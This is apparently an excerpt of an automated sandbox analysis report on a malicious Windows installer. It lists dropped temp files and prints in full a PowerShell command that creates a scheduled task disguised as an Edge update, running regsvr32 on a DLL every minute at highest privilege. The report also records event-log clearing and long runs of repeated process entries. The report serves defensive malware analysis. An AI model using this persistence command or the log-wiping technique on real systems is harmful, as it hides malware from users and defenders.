Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	File created: C:\Users\user\AppData\Local\Temp\is-I54BB.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	File created: C:\Users\user\AppData\Local\is-HU557.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\RXxeYma4d5.exe	File created: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	File created: C:\Users\user\AppData\Local\Temp\is-I3JO9.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	File created: C:\Users\user\AppData\Local\unins000.exe (copy)	Jump to dropped file

Boot Survival

Uses Register-ScheduledTask to add task schedules

Source: C:\Windows\System32\regsvr32.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:360 C:\Users\user\AppData\Roaming\Setup_Cow.dll\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{8208A45D-F29A-4A60-CBD5-99028FB966B8}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Windows\System32\regsvr32.exe

Code function: 5_2_02E4E03A OpenEventLogW,ClearEventLogW,CloseEventLog,

5_2_02E4E03A

Source: C:\Windows\System32\regsvr32.exe

Key value created or modified: HKEY_CURRENT_USER\Console\1 d33f351a4aeea5e608853d1a56661059

Jump to behavior

Source: C:\Users\user\Desktop\RXxeYma4d5.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-25UIU.tmp\RXxeYma4d5.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RXxeYma4d5.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-6HP8A.tmp\RXxeYma4d5.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
